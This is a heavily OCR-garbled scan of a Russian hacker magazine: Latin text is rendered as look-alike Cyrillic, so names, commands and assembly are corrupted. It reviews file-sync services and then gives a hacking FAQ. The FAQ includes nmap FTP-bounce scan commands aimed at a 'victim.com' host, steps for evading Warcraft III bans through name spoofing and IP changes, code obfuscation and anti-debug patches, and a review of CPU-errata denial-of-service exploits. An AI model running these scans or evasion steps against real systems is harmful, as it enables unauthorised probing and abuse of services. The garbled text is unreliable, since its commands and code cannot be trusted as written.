— ѵѵѵѵѵѵ.деІсІгорЬох.сот . 

ОгорЬох — онлайн-сервис для хранения данных, с помощью 
которого можно синхронизировать файлы на нескольких ком- 
пьютерах. Использовать его проще простого. Ты скачиваешь 
программу, регистрируешься на сервисе (регистрация только 
по инвайтам, подробности в сноске), после чего на компью- 
тере появляется папка Му ОгорЬох. Обращаю внимание: это 
самая обычная папка, и единственное, что ее как-то выделяет 

— малюсенькая пиктограмма ОгорЬох вуглу иконки. Ностоит 
скопировать в эту папку какой-нибудь файл, какее содержи- 
мое автоматически синхронизируется с сервером. Новый 
файл появится (конечно, предварительнозакачавшись) 

на всех компьютерах, где ОгорЬохустановлен и привязан к 
твоему аккаунту. Все просто и максимально прозрачно. Все 
действия по синхронизации выполняются полностью на ав- 
томате. При этом набор пиктограмм, которые накладываются 
поверх обычных и конок файлов, всегда наглядно показывает 
статус любого из файлов: «необходимо обновить», «обнов- 
лен», «обновляется». 




иваться в систему и 
предоставляетте же 
2 Гб для хранения 
файлов на бес- 
платном аккаунте. 

Но по сравнению с 
ОгорЬох, он не от- 
личается потрясаю- 
щей прозрачностью. 




> ІП^О 

Уже во время сдачи 
номера нашелся 
отличный сервис 
Зупсріісііу ( 

зупсріісііѵ.сот ). 

похожий на ОгорЬох, 
но позволяющий 
синхронизировать 
любыеуказанные 
папки и файлы на 
компьютере. Еще 
одна фишка - воз- 
можность совмест- 
ной работы. 
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Тихо! Идетанализ и синхронизация данны: 






А 



> іп^о 

Получить инвайт 
для регистрации Аа 
сІгорЬох.сот оче 
просто. Для этой 
нужно оставить заявку 
в соответствующей 
ветке форума Іогит. 
хакер.ги . Кто-нибудь 
из редакции или уже 
зарегистрировав- 
шихся читателей обя- 
зательно поделится 
приглашением. 



Дополнительные действия можно выполнить через контекст- 
ное меню. Сервисхранитисторию всех изменений, иты всегда 
можешь восстановить то, что менял неделю или даже месяц 
назад. Лично меня эта офигенная фича выручала не раз. Если 
положить файлы в папку РиЫіс (создается внутри ОгорЬох 
поумолчанию),тоони станут общедоступны. Чтобы получить 
линк, которымты можешь поделиться с друзьями, надо лишь 
дважды кликнуть мышкой в контекстном меню. 

Каждому пользователю ОгорЬох дается в распоряжение 
2 Гб пространства, и, похоже, скоро за отдельную плату 
этот объем можно будет увел и чить. Пока ОгорЬох доступен 
только для Мае и ѴѴІпсІоѵѵв, но разработчики обещали, 
что появится версия для Ыпих. Для установки клиента не 
нужны права администратора, поэтому заинсталить его 
можно практически гдеугодно. Работая на чужом компью- 
тере, ты легко можешь скачать файл или, наоборот, залить 
его на сервер, использую удобнейший онлайн-интерфейс. 
Аплодирую стоя! 

Н СИНХРОНИЗАЦИЯ ФАЙЛОВ ЧЕРЕЗ СЕТЬ 

Понятно, что ОгорЬох подходит для синхронизации доку- 
ментов, исходных файлов программ и прочих небольших 
файлов, которые быстро закачаются на сервер и не разорят 
хозяина натрафике. Если речь идето больших массивах 
данных, то такое решение, конечно, не подходит. В этом 
случае лучше обновлять данные через локальную сетьс 
помощьютакого замечательного инструмента, какбоосІБупс 
( ѵѵѵѵѵѵ.дооЬвѵпс.сот/ги ). Чтобы наладить синхронизацию 
по сети, достаточно расшаритьсинхронизируемые папки и 
настроить между ними задачу репликации. Правда, нужно 



внимательно отнестись кустановке прав доступа кэтим 
папкам. Мало этого, данные будут передаваться по незащи- 
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Пока мы разбираем дополнительные средства синх- 
ронизации данных, сама ѴѴіпсІоѵѵз предлагает готовое 
решение. И предлагает давно. Я говорю о «Портфеле». В 
первых версиях ОС значок этой опции был на рабочем 
столе по умолчанию. Теперь же необходимо создавать 
его вручную, выбрав в проводнике нужный путь и 
вызвав контекстное меню «Создать -> Портфель». 

Как пользоваться? 

1. Первым делом необходимо выбрать место для 
главной копии файлов — я использую сетевую папку на 
файловом сервере. Можно также использовать флешку. 

2. На других компьютерах нужно также создать «Порт- 
фель». Обрати внимание: на этих машинах должен 
быть доступ к главным копиям документов. 

3. Теперь открой портфель и положи туда файлы, нуж- 
ные тебе в удаленной работе. 

4. Не забывай синхронизировать «Портфель» до ухода 
и по возвращении. 

Кто же знал, что спустя столько лет «Портфель» найдет 
свое применение? :) 
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Я перешел на онлайн-аггрегатор Соо^іе Кеасіег Г геабег. 
^оо^іе.сот) . чтобы всегда иметь под рукой актуальную 
КЗЗ-ленту с единой базой подписок и прочитанных/не- 
прочитанных сообщений. При многих неоспоримых 
преимуществах быстро выяснились и минусы. Оставшись 
без подключения к Сети, прочитать фиды становится 
проблематично. Да и вообще, хочется иногда использо- 
вать обычное десктопное решение, которое закачает фиды 
пачкой и покажет безо всяких тормозов. К счастью, теперь 
можно совмещать и то, и другое. Последняя альфа-версия 
К88 ВапсШ Г ѵѵѵѵѵѵ.гззЪапсІй.ог^) отлично синхронизирует- 
ся с твоими подписками в Соо§1е Кеабег’е. Дома удобнее 
использовать десктопный клиент, а работая за другими 
компьютерами — интерфейс от Соо§1е. 



Контакты и календарь 

Чтобы, наконец, синхронизировать все контакты, календарь на 
телефоне/смартфоне, а также из ОиНоок’а и онлайновых служб 
вроде Соо§1е Саіепбаг и Стай, необязательно устанавливать 
десяток программ. С этим справится специальный сервис Ріахо 
Г ѵѵѵуѵѵ.ріахо.сопг) . 

После регистрации необходимо создать точки синхронизации 
(Зупс роіпщ), а на компьютере установить специальный пла- 
гин для ѴѴіпсІоѵѵз — после чего связать эту комбинацию между 
собой с помощью настроек. Подобной функциональности так- 
же можно добиться, используя ЗсйесІиІеѴѴогІсІ Г зсЬебиІешогМ. 
сот) и продвинутые плагины Г шшшДипатЬоІ.огу) . Он, в 
частности, позволит синхронизировать контакты на телефоне 
по ВІиеіооіЬ. с адресной книгой онлайн-сервисов прямо из окна 
РігеГох’а! 
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Благодаря наглядным иконкам сразу видно, какие файлы уже обновлены, а 
какиетолько обновляются 



щенному каналу связи, поэтомутеоретически их могут перехватить. В целях 
защиты можно криптоватьтрафик между двумя компьютерами, организо- 
вав 55Н-туннель (подробности смотри в мануале по программе). 

Во время двусторонней синхронизации могут происходить так на- 
зываемые конфликты. Если с двух сторон файл изменился уже после 
синхронизации, то при следующей будетуказано наличие конфлик- 
та. Чтобы разрешить конфликт, нужно указать для файла требуемое 
направление синхронизации. Программа умеет создавать резервные 
копии предыдущих версий в подпапке _дзсіа1;а_. Более того, может 
оказаться так, что некоторые типы файлов или конкретные документы 
синхронизировать не нужно. Разработчики предусмотрели такую си- 
туацию, поэтому в настройках задания реализована удобная система 
фильтров. 

Синхронизацией папок ѴѴІпсіоѵѵб возможности СоосІБупс не ограничивают- 
ся. Программа отлично синхронизирует файлы по протоколам РТР, ѴѴеЬОАѴ, 
5РТР. Я давно не использую РТР-клиентдля обновления файлов на наших 
сайтах — сэти справляется СоосІБупс, закачивая файлы на серверы с 
локальной версии. НС 
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ХАКЕРСКИЕ СЕКРЕТЫ 
ПРОСТЫХ ВЕЩЕЙ 



{пеонид «св@ ѵѵі_ев» исупов 

/ ПОЮ@МАІІ..П1І / / СП АѴѴІ.ЕВН АСК@ВАМВІ_ЕК.ВІІ / / КАІГОГЫГЕ@ВК.ВІІ / / ШВѴНАѴѴК@ВАМВІ.ЕВ.В1І / 




ЗАДАЧА: 



I ВЫЯСНИТЬ МАКСИМАЛЬНОЕ КОЛИЧЕСТВО ИНФОРМА- 
ЦИИ О ЧЕЛОВЕКЕ, КОТОРЫЙ ПЕРЕДАЛ ТЕБЕ ВОРДОВСКИЙ ФАЙЛ 

РЕШЕНИЕ: 



Подобные ситуации актуальны, когда перед твоими глазами оказывается 
«анонимка» или тебя просто разобрало любопытство. 

Ты наверняка слышал о метаданных и метаописании. Они включаются во 
многие форматы и зачастую в них автоматически попадают: имя машины, 
05, локальный путьдофайла ит.п. Из этих данных можно с легкостью по- 
нять, кому принадлежал документ и кто его автор — в общем, ровното, что 
нам нужно. Итак, представь, что перед тобой неизведанный вордовский 
файл, о котором нужно узнать все. 

1. Сливаем программку для экспорта метаданных — теіа-ехігасіог. 
зоигсеЬгде.пеЕ 

2 . Получаем нехитрый ХМб-отчетик, который сразуже и открываем. 

3. Вчитываемся и видим примерно следующее: 



<МеБаБаБаКесогсІСгеаВог>Михаил Анатольевич 
</<МеБаВаБаКесогсІСгеаБог> 

<Наг<іѵ^агеЕпѵіготепЦ>х8б</Наг(іѵ7агеЕпѵіготеп1с> 
<Зо1БілагеЕпѵіготепВ>03 :ЭДіпскжз 2 000, 5.0, БѴМ: Зип 
МісгоЗузБетз Іпс . </ЗобЕ^агеЕпѵіготепЕ> 



4 . Не забудем защититься от «утечки» со своей машины. Сливаем софтину 
гНсИооІ (ОНісе 2003/ХР АсИ-іп: Пегтюѵе НісИеп Оаіа) и убираем ей всячес- 
кие метатеги. Эту программу можно найти на официальном сайте Місговоб: 
либо на нашем 0Ѵ0. 

Кстати! Меіабаіа Ехігасбоп Тооі применима нетолько кдокументам ОІІісе, 
но и к Р0Р, графическим и даже к видеофайлам. Помни это и возьми про- 
грамму на вооружение. 




№2 



ІЗАДАЧА: 



ЖИЗНЬ РЕВЕРСЕРА, ИСКАЗИВ КОД ПРОГРАММЫ ДО НЕУЗНАВАЕ- 
МОСТИ 
РЕШЕНИЕ: 

Рассмотрим простую программу, которая выполняет единственное действие 
— выводитокошко с надписью «Зітріу Ргодгат». Дизассемблированный 
листинг программы предельно понятен: 



00401000 РІІЗН 0 

00401002 РІІЗН ех. 00403000 ргодгат" 

00401007 РІІЗН ех . 00403 00Е 
0040100С РІІЗН 0 

0040100Е САБЕ < БМР . &изег32 . МеззадеВохА> 

00401013 РІІЗН 0 

00401015 САЬЕ <БМР . &кегпе132 . ЕхіБРгосезз> 
0040101А БМР БШРБ РТК БЗ : 

[<&кегпе132 . ЕхіБРгосезз>] 

00401020 БМР БШКБ РТК БЗ : [<&изег32 .МеззадеВохА>] 



1 . Первое, что мы сделаем, — заменим инструкцию, находящуюся по адресу 
0040100Е, на переход: 0040100Е БМР 0040102Е. 

По адресу 0 0401 02Е поместим функцию Мез задеВохА, скопировав ее 
при помощи пункта меню правой кнопки мыши: «Віпагу -> ВіпагуСору». 
Перейти внутрьтела функции можно, нажав на клавишу <Р7> и находясь 
в точке вызова. Возни кает две проблемы: первая — вызов«апишки» 
МеззадеВохЕхА по относительному адресу, который при вставке копии 
тела функции поадресу0040102Рстановится недействительным. Решение 
очевидно: меняем инструкцию вызова по адресу 00401 06Р на явный вызов 
— выделяем команду, нажимаем пробел и в появившемся окошке вбиваем 
саіі ІІзег32 .МеззадеВохЕхА. Вторая проблема — это операция возвра- 
та из функции, которая тоже оперирует относительным адресом, а не абсо- 
лютным. Тутеще проще — мы знаем адрес, по которому должна будет про- 
изводиться передачауправления после вызова. Адрес этот— 00401010. 
Значит, поадресу 00401075 вбиваем инструкцию :ітр 00401010. 

И еще. Некоторые параметры для функцииМеззадеВохЕхАиспортились. Код 
передачи параметров в стеквыглядиттак: 



00401061 РІІЗН 0 

00401063 РІІЗН БШКБ РТК 33: [ЕВР+14] 
00401066 РІІЗН БШКБ РТК 33: [ЕВР+10] 
00401069 РІІЗН БШКБ РТК 33: [ЕВР+С] 



; ісЗ языка 
; стиль окна 
; заголовок 
; текст 
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О 04 01 Обе РБЗН ШОКБ РТК 33: [ЕВР+8] ; владелец окна 

0040106Р САЬЬ изег32 .МеззадеВохЕхА ; вызов функции 

Как проще всего избавиться от недоразумений? Простое решение: обнулить 
некоторые параметры, а именно — первый, второй и пятый. Итак, заменяем 
первую, вторую и пятую инструкции наризЪ. 0. 

Проверяем. Все работает. Сохраняем программу под новым именем и двигаемся 
далее. 

2. ТеперьточнотакжеразместимтелоАРІ-функцииМеззадеВохЕхАв нашей 
программе (по адресу 004 0107Е) и заменим вызов по адресу 0040106Е на инс- 
трукциюсаіі 0040107Е: 

0040107Е Р103Н ЕВР 
0040107Е МОѴ ЕВР , ЕЗР 
00401081 Р103Н -1 

00401083 РБЗН БШКБ РТК 33: [ЕВР+18] 

00401086 РБЗН ШОКЬ РТК 33: [ЕВР+14] 

00401089 РБЗН ШОКЪ РТК 33: [ЕВР+10] 

0 04 01 0 8С РТОЗН ШСЖБ РТК 33: [ЕВР+С] 

0040108Е РТОЗН ШОКБ РТК 33: [ЕВР+8] 

00401092 САЬЬ изег32 .МеззадеВохТітеоиЬА 
00401097 РОР ЕВР 
00401098 КЕТЫ 14 



Сохраним программу под новым именем. 

3. Запустим нашу программу под отладчиком еще раз и внимательно ее 
протрассируем по <Р8>. Легко заметить, что инструкции, начиная садреса 
0040103Б и заканчивая адресом 00401061, не получают управления, так 
как по адресу 0040103В находится условный переход, который выполняется 
всегда. Поэтому можно удалить эти инструкции, заполнив их нулями; выделя- 
ем их и выбираем из контекстного меню правой кнопки мыши: «Віпагу ->РІІІ 
ѵѵіІЬ ОО’з». Сохраняем файл и переходим к следующему шагу. 

4. Последний, завершающий, шаг — удаление перехода на 
МеззадеВохА по адресу 00401020. Можно заменить переход нуле- 
выми байтами или инструкциями «пор». По собственной инициативе 
ты можешь удалить секции нулей, которые образовались в результате 
наших манипуляций. 

Итог работы — код, в котором нигде не фигурируют инструкции, в 
явном виде указывающие на вызываемую АР I -функцию. Все этапы 
работы в виде измененного пошагово файла ты можешь увидеть на 
нашем 0\Ю. 

Рассмотренный метод переноса исполнимого кода АРІ в РЕ-файл 
программы хорош, прежде всего, тем, что можно «спускаться в самый 
низ» системных библиотек, детализируя файл программы таким 
образом, чтобы его функциональность строилась на низкоуровневых 
АРІ, обращающихся к ядру ОС. Работать с таким кодом в отладчике 
очень сложно. 




ЗАДАЧА: 



]УЗНАТЬ, ДОСТУПЕН Л И МЕТОД РТР-ВОІШСЕ ДЛЯ СКАНИ- 
РОВАНИЯ ПОРТОВ 

РЕШЕНИЕ: 




Идея, которую мы 
тебе предложим, 
позволяет выяс- 
нить, какие порты 
реально открыты 
даже на жутко за- 
фаерволенном уда- 
ленном сервере. 
Сделать это можно 
путем использова- 
ния некорректно 
сконфигуриро- 
ванного РТРй и 



команды РОЕТ. Самый верный способ — пообщаться с РТР-сервером 
на его языке. Чтобы не заниматься «геморированием», воспользуемся 
новой фишкой старого сканера N МАР — скриптовым языком ІЧ5Е. Для 
элегантного решения задачи нам нужно: 

1. Скачать и установить последнюю версию ІЧМАР. 

2. Убедиться в наличии сценария ІЬрЪоипсе . пзе в /изг/іосаі/ 
зЬаге/зсгірЬз (либо взятьскриптс нашего 0Ѵ0). 

3. Запустить сканер в «особом режиме» — «птар --зсгірЬ=ІЬрЪоипсе . 
пзе ѵісЬіт.сот» 

4. Дождаться положительного ответа, который означает применимость 
метода ЕТР-Ьоипсе. 

5. Воспользоваться методом сканирования, который покажет, открыт порт 
8080 или нет — «птар -Ь апопут@ѵісЬіт. сот -р 8 080 ір». 

6. Написатьскрипт для автоматизации и перебора сканируемых портов. 
Строго опционально :]. 

В данный момент на официальном сайте ІЧМАР появилась первая докумен- 
тация по ІЧ5Е и куча наставлений по созданию собственных скриптов для 
ММАР (і пзесиге.огд/птар/пзе/ І. Как говорится, дерзай! 



№4 

Е2НШІ ПРОВЕРИТЬ ЦЕЛОСТНОСТЬ ФАЙЛОВ НА СЕРВЕРЕ 

РЕШЕНИЕ: 

Зачастую нам необходимо вести наблюдение за изменением файлов на 
том или ином сервере. Причем, не столь важно, какой сервер — легальный 
или хакнутый. Суть одна — убедиться в отсутствии залитых веб-шеллов и 
вредоносных файлов. Но проверить весь находящийся на сервере контент 
вручную иногда попросту невозможно. Лучше воспользоваться скриптом 
под названием «5і*е Рііе СИескег». Чтобы утебя не возникало вопросов, 
давай разберемся с настройкой утилы и ее возможностями. Итак: 

1. Открываем пхп-скриптв блокноте и вписываем вуказанные места 
логин и парольадмина (по дефолту — айтіп: асЗтіп). 



2. Заливаем скрипт в нужную диру (если тебе необходимо проч екать весь 
веб-контент — смелолей скриптв корень веб-каталога). 

3. Обращаемся к скрипту, вбиваем указанные ранее логин/пасс и логи- 
нимся. 

4. Выбираем пункт«Посчитать контрольные суммы». Будет отображен 
список всех вложенных каталогов и каталог, в котором находится скрипт. 
Здесь можно выбрать, какие директории нужно анализировать, а затем 
— нажать «Готово». Скрипт выдаст отчет анализа. Скопируй его и сохрани 
в какой-нибудь файл на локальном компьютере. Отчет выглядит пример- 
нотак: 

— 20.06.2008 21:20:49- 

— аіі сіігз- 

/ Лоте / р 2 Л / риЫ і с_ІШт1 / Ь з Ь 
/ Лоте / р 2 Л / риЫ і с_!Шт1 / Ь з Ь / Ьтр 

— апаіугесі сіігз- 
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/ йоте / р 2 Ъ. / риЫ і с_Ы:т1 / С з Б 
/Ьоте/р 2 Й/риЪ 1 іс_йСт 1 /Сз 1 і/Стр 

— апаіугесі Іііез- 

/1іоте/р2]т/риЬ1іс_йЦт1/ЦзЦ/іпс1ех . йСтІ 
0с5Ъ2258<ібЬ892 9 б47аОЪ7сМОО 032793 
1201852523 

/Ь.оше/р2Ь./риЫіс_!Ы:т1/1із1:/гез1 . рАр 
55662 3ЬЬЗе5сі11сса99111(і5е2 12Ь594 
1201852841 

5. Когда тебе потребуется проверить целост- 
ность файлов на сервере, нужно выбрать пункт 
меню «Сравнить контрольные суммы». Затем 
указать сохраненный ранее файл отчета и на- 
жать «Готово». Скрипт самостоятельно произ- 



ведет сравнение файлов и директорий и выдаст все найденные отличия. 
Крометого, рекомендуется перед каждой проверкой перезаливать 
сценарий на сервер. Ведь он также может быть изменен недоброжелате- 
лями! 



Чекаем файлы на серв 




Я" Г5рСН«^Н.О 
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№5 

ЩТЩДЗАЩИТИТЬСЯ ОТ ПРОТРОЯНИВАНИЯ РШСН’ЕМ 

ЖЕ: 

Повальное распространение Пинча повлеклоза собой массу проблем. 
Утила «АпбріпсИ» была написана специально, чтобы анализировать подоз- 
рительные ехе-файлы и определять в них наличие этого известного трояна. 
Разберемся с алгоритмом работы утилы: 



1 . Тулза запускает подозрительный файл и внедряет в него <311. 

2 . Перехватывает СгеаСеРгосеззА/СгеаСеРгосеззМ и внед- 
ряет БЫ. в дочерние процессы. 

3 . Также перехватывает соппесС/зепЗ и не позволяет трояну 
отправить данные на гейт. 

4 . Создает подробный лог- 
файл. 

Учти, что софтина работает толь ко с 
гейтовой версией пинча! 




Защити себя от РіпсЬ'а 




ЗАДАЧА: 



ЗАЩИТИТЬ АККАУНТ ОТ БАНА В ѴѴАКСКАРТ 



РЕШЕНИЕ: 



Что такое \Л/агСгаИЗ:ТРТ знают если не все, то — через одного точно. Нас 
интересует игра онлайн через ВаПІе.Меі в «пользовательских» играх 
(Сизіот Ѳате). 

Есть несколько основных причин бана, но некоторые банят всех подряд 
и за что попало. Делается это при помощи программы ѴѴСЗВапІізІ [ ѵѵѵѵѵѵ. 
уусЗЬапІізЫе], защитой от которой мы и займемся. 

1. Запускаем Варкрафт и заходим в Ваиіе.Ыеі на любой изсерверов под 
любым логином (ником). 

2. Запускаем прогу ѴѴЗХМатеБроо^ег. Пишем свой ник в поле «Уоиг ІЧеѵѵ 
Ыате». 

3. Выбираем цвет, жмем «Сизіопп» и «СИапде Ыате». Проверяем статус 
(должен быть«Биссев5»), автоматически определенное имя и адрес игро- 
вого сервера, а также цветсвоего ника в поле «Уоиг Ыеѵѵ №те». 

4. Заходим в любую пользовательскую игру л ибо создаем свою собствен- 
ную. Теперь нам не страшен бан, так как наш ник (допустим, І_иску) отобра- 
жается в самой игре как І_иску выбранным цветом, а в ѴѴСЗВапІіз* в виде 



« I СРРООООООБиску», где первые 10 символов отвечают за цвет(«|СРР» + 
8-значный Ьех-код цвета). 

5. Допустим, что нас забанили. Перезаходим в ВаАІе.ІЧе* под другим ІР. 

Если ІР динамический — просто переподключаемся кСети. 

6. Разворачиваем прогу и меняем цвет ника на любой другой (шаги 2-3). 
Теперьнаш никчисти при входе в игрустеми, кто насзабанил, можетбыть 
выведено лишь предупреждение отом, что мы используем цветной ник: 
«ѴѴАРЫІЫ6! Риску ивеза пате зрооіег». 

Если бы не было предпринято мер (те самые шаги 2-6), — было бы выведено 

оповещение отом, 
что мы забанены. Вид 
оповещения зависит 
от настроек ѴѴСЗВапІізі 
утого, ктозабанил, 
например: «Биску 
Ьаз Ьееп Ьагшеб аз 
а Іеаѵег оп (5x5) 

' название_игры ' 
[бау/шопСЬ/уеаг] », 

— после чего нас бы 
просто выкинули из 
игры. 




№7 

ДОБАВИТЬ АНТИОТЛАДОЧНЫЙ КОД В ПРОГРАММУ 
ПРИ ПОМОЩИ ОТЛАДЧИКА 



РЕШЕНИЕ: 

Что делать, если требуется защитить уже откомпилированную программу от 
реверсеров хотя бы низкого уровня, а готовых решений и программных па- 
кетов защиты под рукой нет? Можно использовать простой способ, который 
я опишу ниже. Для претворения его вжизнь нам не понадобится никаких 
инструментов, за исключением отладчика и доли смекалки. 



► 038 
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Как известно, в процессе отладки по адресу, находящемуся в регистре РБ, 
записывается структура, необходимая для корректной работы программы. 
Она зовется ТЕВ (ТЬгеасІ Епѵігоптепі Віоск). Одно из полей ТЕВ, располага- 
ющееся поадресу Е8 : [30] , называется РЕВ (Ргосезв Епѵігоптепі Віоск) и 
содержитуказатель на дочернюю одноименную структуру. В свою очередь, 
структура содержит флаговую переменную ЕШСІоЪаІЕІад (находящуюся 
на 68 байт«ниже» стартового адреса структуры РЕВ), которая обычно равна 
нулю. Еслиже программа отлаживается, то эта переменная принимает 
значение, отличное от нуля. Не вдаваясь втонкости, скажем, что ненулевое 
значениеБДСІоЪаІЕІад в нашем случае однозначно говоритотом, что 
процесс находится под отладчиком. Значит, несложный антиотладочный 
механизм на основе определения значения РШСІоЬаІРІад будет выгля- 
детьтак, какописано ниже. 

1 . Получаем адрес структуры РЕВ: 

МОѴ ЕАХ, Е8 : [3 0] 

2. Получаем значение переменнойБДСІоЪаІЕІад (оно находится по 
адресу ЕАХ+68): 

МОѴ РАХ, Б8: [ЕАХ+68] 

3. Сравниваем полученноезначениес нулем: 

ТЕЗТ ЕАХ , ЕАХ 

4. Если значение равно нулю, переходим квыполнению программы (отлад- 
чик не обнаружен), иначе — завершаем работу программы: 

БЕ выполнение_программы 

Применительно к стандартному «блокноту», код будет выглядеть следую- 
щим образом: 




ЗАДАЧА: 



ВОССТАНОВИТЬ УТЕРЯННЫЕ ДАННЫЕ С ВИНЧЕС- 



ТЕРА 

РЕШЕНИЕ: 



Рабочие данные, компроматна начальника или просто давнозабытая 
фотка могут неожиданно порадовать или огорчить — все зависит от цел и 
восстановления. Насже интересуют средства ее достижения. 

1. Первой под прицел попала беЮаіаВаск ( ѵѵѵѵѵѵ.гипііте.огд ). Эта утила 
может работать каксжесткими дисками, НавЬ-накопителями, так и с фай- 
лами-образами (.ітд). Удобный интерфейс позволяет выбрать физические 
и логические диски, задать диапазон сканирования с точностью до сек- 
тора. Достоинствами СеЮаіаВаск являются приемлемая скорость поиска 
и возможность его остановки для дальнейшей работы суже найденными 
файлами. Ждать полного скана 160 Гб винчестера, все же, утомительное 
занятие. Окно с выбором файлов для восстановления содержит дерево 
каталогов и полную статистику по файлам и папкам, оформленную в виде 
таблицы. Для удобства пользователя — удаленные, скрытые, системные, 
сжатые и геаб-опіу файлы выделены отдельными цветами. Поддержива- 
ется поискпо маске имени файла, диапазону дат изменения и диапазону 
кластеров. Работать с прогой легко и приятно. 

2. Ее конкурентом в сфере восстановления данных является ЕазуРесоѵегу 
( ѵѵѵѵѵѵ.опігаск.сопп ). Пользователю предоставляется ряд тестов (тестаппа- 
ратных проблем, БМАРТ-тест и проверка файловой системы), возможность 
восстановления удаленных и реставрации поврежденных файлов. Фильтр 
позволяет отделять файлы с плохим размером, датой, именем, просто 
удаленные — либо с различными комбинациями этих флагов. 



01006АЕ0 БМР 01007Б72 ; переходим к области, заполнен- 

ной нулями, где разместим наш антиотладочный код 

01007Б72 РБЗН 7 0 ; первая инструкция по адресу 

001006АЕ0, мы заменили ее на инструкцию перехода 
0 1 0 0 7 Б7 4 РБ8Н 01001888 ; вторая замененная нами инструкция 
01007Б79 МОѴ ЕАХ,Е8: [30] ; получаем указатель на РЕВ 

01007Б7Е МОѴ ЕАХ , Б8 : [ЕАХ+68] ; помещаем в еах значение 
БбСІоЬаІЕІад 

01007Б82 ТЕЗТ ЕАХ , ЕАХ ; проверяем еах на равенство нулю 
01007Б84 БЕ 01006АЕ7 ; если ЕАХ равен нулю, переходим 

к выполнению программы 

Теоретически, мы могли бы разместить сразу после инструкции БЕ 
01006АЕ7 команду завершения процесса. Номы не будем об этом забо- 
титься, ведь при обычном запуске программы инструкция перехода обяза- 
тельно сработает. Последствия выполнения случайного кода при запуске 
программы из-под отладчика нас совершенно не интересуют :). 

Весь код забивается прямо под отладчиком ОИуОЬд, как мы это делали 
и раньше, с последующим сохранением программы (выбираем из меню 
правой кнопки мыши пункт«Сору іо ехесиіаЫе -> АН тосіііісаііопз» и в 
появившемся окне из контекстного меню — пункт«5аѵе»; сохраняем файл). 
Попробуй запустить полученную программу под ОИуОЬд и оцени результат 
работы :). 

Блокнот на встроенном защитном коде 




3. В отличие от предыдущих утилит, РС Іпзресіог Рііе Ресоѵегу 
( ѵѵѵѵѵѵ.рсіпвресіог.сіе ) наиболее понятно отражает состояние файлов на 
носителе. В дереве каталогов четко разделяются имеющиеся на данный 
момент файлы, удаленные и поврежденные, причем прога находити 
удаленные папки, подсвечивая ихзеленым цветом. Поиск осуществляется 
по маске имени файла и диапазону кластеров (его физическому располо- 
жению)^ помощью этих трех п рог можно решить проблему восстановления 
удаленных и поврежденных данных, но стоит иметь в виду, что софт не 
можеттворить чудеса. Из-за особенностей носителя не всю информацию 
возможно восстановить. ~і~ 



ншвт 
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ОБЗОР эксплоитов 



ЭТОТ ОБЗОР ЕЩЕ БОЛЕЕ НЕОБЫЧЕН, ЧЕМ ПРЕДЫДУЩИЙ. ПОСВЯЩЕН ОН ОШИБКАМ ПРОЦЕС- 
СОРОВ, ОБНАРУЖЕННЫХ ЗА ПОСЛЕДНЮЮ ПАРУ МЕСЯЦЕВ. ВЕДЬ ДАЖЕ ЕСЛИ ОПЕРАЦИОННАЯ 
СИСТЕМА НЕ СОДЕРЖИТ ДЫР (НАПРИМЕР, 0РЕЫВ50), УДАЛ ЕННАЯ АТАКА ВСЕ РАВНО ОСТАЕТСЯ 
ВОЗМОЖНОЙ — БЛАГОДАРЯ ДЕФЕКТАМ ПРОЕКТИРОВАНИЯ ПРОЦЕССОРА! 



ІМТЕІ. 

РЕЫТШМ 

\ 9 I ЗАВИСОННА 

НЕВЫРОВНЕННЫХ 

ЦИКЛАХ 



» Вгіе* 



В июне 2008 года сотрудники 
тестовой лаборатории корпорации 



Іпіеі обнаружили ошибку в про- 
цессоре Соге 2 Ехігете Ргосеззог 
0X9775, связанную с некоррект- 
ной обработкой невыровненных 
условных переходов, пересекающих 
16-байтовые границы. ЦП высажи- 
вался на измену, результаты которой 
варьируются от генерации исключе- 
ния «тасЫпе сЬеск ехсерѣіоп» 




до полного зависания системы. Баг 
возникаеттолько на определенных 
временных диаграммах, а потому 
чаще всего он проявляется именно 
в компактных вложенных циклах 
(збогі пезіесі Іоорз), для выполне- 
ния которых достаточно запустить 
на машинежертвы специальный 
ЗаѵаЗсірі. Тогда (при активном Заѵа- 
компиляторе, компилирующем код в 
память) мы получим тотальный отказ 
в обслуживании — тобишьйоЗ. 
Назвать этуошибку новой нельзя. 
Впервые она была обнаружена в 
феврале 2008-го в процессоре Соге 
2 Ехігете Ргосеззог 0X9000, а спустя 
неделю — еще в куче других. Пока 
Іпіеі рассылала разработчикам 
ВІОЗ’ов рекомендации поустране- 
нию обозначенного дефекта, в руки 
тестеров попал новый (едва ли не но- 
вейший, а потому — жутко дорогой) 
Соге 2 Ехі гете Ргосеззог 0X9775, 
соде ржа щийтужесамуюошибку, 
полученную по «наследству». 



»ТагдеІ5| 



Дефект выявлен в следующих 
процессорах: ОиаІ-СогеХеоп 
Е31 10, ОиасІ-СогеХеоп 3300, йиаі- 
Соге Хеоп 5200, ОиасІ-Соге Хеоп 
5400, Соге Ехігете 0X9775, Соге 2 
Ехігете ОиасІ-Соге 0X6000, Соге 2 
ОиасІ 06000, Соге 2 Ехігете 0X9000, 
Соге 2 ОиасІ 09000. Однако ошибка 
может присутствовать и в процессо- 



рах младше, уже снятых с произ- 
водства, а потому и нетестируемых. 



» ЕхрІоіі| 



Исходный текст ехріоіі’а, написан- 
ный мной на ассемблерных вставках 
на М5 Ѵізиаі, С++ ищи на йѴВ. При 
выполнении на указанных процес- 
сорахс дряхлой версией В 1 05’а 
наступает крах (зависон). Для пе- 
реноса ехріоіі’а на ЗаѵаДіаѵаЗсгірі 
необходимо знать особенности 
Заѵа-транслятора конкретного 
браузера, а потому готовые решения 
здесь не приводятся. 



»5оІи1іоп 



Обновить прошивку ВІ05 (если 
производитель материнской платы 
исправил этот дефект процессора 
— что вовсе не факт!). 




Зеленый цвет процессоров семейс- 
тва Іпіеі Соге (мобильная версия) 
наводит на мысли отраве 



► 040 
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ШТЕІ. 

РЕЫТШМ 

V Шшт УБИЙСТВО 
ВИРТУАЛЬНЫХ МА- 
ШИН 



>> Вгіе{ 



В июне 2008 года в процессорах 
Соге 2 Ехігете ОиасІ-Соге 0X6000 и 
Соге 2 ОиасІ 06000 была обнаруже- 
на ошибка в менеджере вирту- 
альных машин (Ѵігіиаі МасЫпе 
Мападег или, сокращенно, ѴММ), 
позволяющая зловредному коду, 
исполняющемуся на нулевом коль- 
це, «убивать»текущую виртуаль- 
ную машину. Линейку ЫТ- подобных 
систем этим не удивишь, так как 
с нулевого кольца легко устроить 
ВБОй даже безо всяких ошибок в 
ЦП. А вот Ыпих/ВБО некорректным 
модулем ядра завалить труднее. К 
томуже, если виртуальная машина 
предусматривает автоматичес- 
кий рестарт гостевой оси при 
возникновении каких-то «терок» 
